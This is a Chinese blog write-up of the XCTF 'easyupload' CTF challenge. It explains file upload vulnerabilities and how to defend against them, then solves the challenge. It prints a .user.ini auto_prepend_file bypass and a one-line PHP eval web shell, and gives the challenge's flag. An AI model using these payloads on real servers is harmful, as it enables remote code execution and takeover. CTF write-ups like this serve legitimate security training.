【愚公系列】2023年05月 攻防世界-Web(easyupload)

【愚公系列】2023年05月 攻防世界-Web(easyupload)

文章目录

  • 前言
  • 一、easyupload
    • 1.题目
    • 2.答题

前言

文件上传漏洞是指攻击者通过上传恶意文件的方式,绕过服务器的安全机制,向服务器上传含有恶意代码的文件,从而实现对服务器的攻击。

攻击者可以通过文件上传漏洞,上传包含木马、病毒、WebShell等恶意代码的文件,进而获取服务器的控制权。攻击者可以利用这些恶意文件进行各种攻击,如窃取敏感数据、修改网站内容、加密勒索等。

要避免文件上传漏洞,可以采取以下措施:

  • 对上传文件的类型和大小进行限制,并对上传的文件进行检查和过滤;

  • 对上传文件的存储路径进行限制,并且不要使用可执行文件的存储路径;

  • 对上传文件的名称进行限制,避免使用易受攻击的名称;

  • 对上传文件的权限进行限制,避免上传文件的权限过高;

  • 对上传文件的访问进行限制,避免上传文件的访问权限过高。

以上措施可以有效地避免文件上传漏洞的发生,保障服务器的安全。

user.ini文件是PHP的配置文件之一,它可以被用来配置PHP的设置,如内存限制和上传文件的大小限制等。该文件通常位于网站的根目录下。

在服务器中,只要是运用了fastcgi的服务器就能够利用该方式getshell,不论是apache或者ngnix或是其他服务器。这个文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。其中很多功能设置了只能php.ini配置,但是还是有一些危险的功能可以被我们控制。

一、easyupload

1.题目

在这里插入图片描述

2.答题

打开连接

在这里插入图片描述

先是上传.user.ini,并对Content-Type: image/jpeg进行修改

GIF89a
auto_prepend_file=a.jpg

上传成功

在这里插入图片描述

再上传a.jpg,这个直接就能上传成功

GIF89a
<?=eval($_POST['cmd']);?> 

在这里插入图片描述

蚁剑连接
在这里插入图片描述

找flag:cyberpeace{5381ebd202141d71986cc6eeeb0d4763}

                       

点击阅读全文

上一篇 2023年 6月 11日 am10:52
下一篇 2023年 6月 11日 am10:53